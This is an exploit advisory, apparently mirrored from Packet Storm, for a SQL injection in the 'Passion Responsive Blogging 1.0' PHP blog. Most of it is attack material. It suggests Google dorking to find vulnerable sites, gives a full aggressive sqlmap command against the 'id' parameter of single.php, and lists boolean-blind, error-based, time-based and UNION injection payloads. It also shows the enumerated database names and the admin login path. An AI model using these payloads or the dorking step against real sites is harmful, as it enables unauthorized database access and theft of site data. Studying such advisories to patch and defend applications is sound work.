Share
## https://sploitus.com/exploit?id=PACKETSTORM:181409
=============================================================================================================================================  
| # Title : Passion Responsive Blogging 1.0 SQL injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://code-projects.org/responsive-blog-site-in-php-with-source-code/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] use payload : /bmacblog/single.php?id=1 <==== inject here   
  
[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs  
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=1' AND 9732=9732-- jEuI  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 9 columns  
Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -  
---  
[23:52:32] [INFO] the back-end DBMS is MySQL  
web application technology: Apache  
back-end DBMS: MySQL >= 5.0 (MariaDB fork)  
[23:52:32] [INFO] fetching database names  
available databases [2]:  
[*] bmac_blog_admin_db  
[*] information_schema  
  
[+] Login : /blogadmin  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================